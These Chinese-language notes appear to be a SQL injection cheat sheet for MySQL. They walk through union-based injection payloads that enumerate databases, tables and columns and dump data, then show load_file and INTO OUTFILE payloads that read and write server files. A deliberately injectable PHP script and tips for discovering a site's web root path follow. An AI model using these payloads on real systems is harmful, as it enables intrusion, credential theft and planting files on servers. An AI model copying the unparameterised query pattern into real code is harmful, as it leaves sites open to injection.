mysql数据库结构:
数据库A --> 表名 --> 列名 --> 数据
数据库B --> 表名 --> 列名 --> 数据
mysql数据库信息:
mysql 5.0以上自带数据库:information_schema
information_schema.schemata: 数据库下的schemata库名,含义:存储所有数据库下的库名信息的表。
information_schema.tables: 数据库下的tables表名,含义:存储所有数据库下的表名信息的表。
information_schema.columns: 数据库下的columns表名,含义:存储所有数据库下的列名信息的表。
database():数据库名
user():数据库用户
version():数据库版本
@@version_compile_os:操作系统
schema_name:库名
table_name:表名
column_name:列名
mysql注入过程:
(1) 判断注入点: ?id=1 and 1=1 ;? id=1 and 1=2
(2) 判断长度: ?id=1 order by 3
(3) 获取基本信息: @@version_compile_os , version() , database() , user()
(4) 获取库名: ?id=1 union select table_schema,2,3 from information_schema.schemata
(5) 获取表名: ?id=1 union select table_name,2,3 from information_schema.tables where table_schema = 库名[16进制]
(6) 获取列名: ?id=1 union select column_name,2,3 from information_schema.columns where table_schema = 库名[16进制]
and table_name = 表名[16进制]
(7) 获取数据: ?id=1 union select 列名[16进制],列名[16进制],3 from 表名[16进制]
mysql文件读写操作:
(1) 读取操作:
?id=1 union select load_file('d:/123.txt'),2,3
(2) 写入操作:
?id=1 union select '123',2,3 into outfile 'd:/123.txt'
注意: 路径问题:
使用"/"或者"\\" ; 原因[编程中"\"多半是转义]
编码问题:
数据中有单引号,将数据编码16进制即可
连接mysql数据库语句:
header("content-type:text/html;charset=utf8");
$id=$_GET['x'];
$conn=mysql_connect("127.0.0.1","root","root");
mysql_select_db("sql",$conn);
$sql = "select * from php where id=$id";
$result=mysql_query($sql);
while($row=mysql_fetch_array($result)){
echo "
"."编号".$row['id']."
";
echo "
"."用户".$row['user']."
";
echo "
"."密码".$row['password']."
";
}
mysql_close($conn);
echo "
"."当前执行的sql语句:".$sql;
?>
网站路径获取方法
(1) 遗留文件:
一般在网站根目录下,命名有php.php info.php phpinfo.php,test.php php_info.php等。
(2) 报错显示
(3)漏洞爆路径
(4) 读取搭建平台配置文件
(5)社工(字典猜解,谷歌黑客等)
D:/www/ ; D:/wwwroot/ ; D:/web/ 等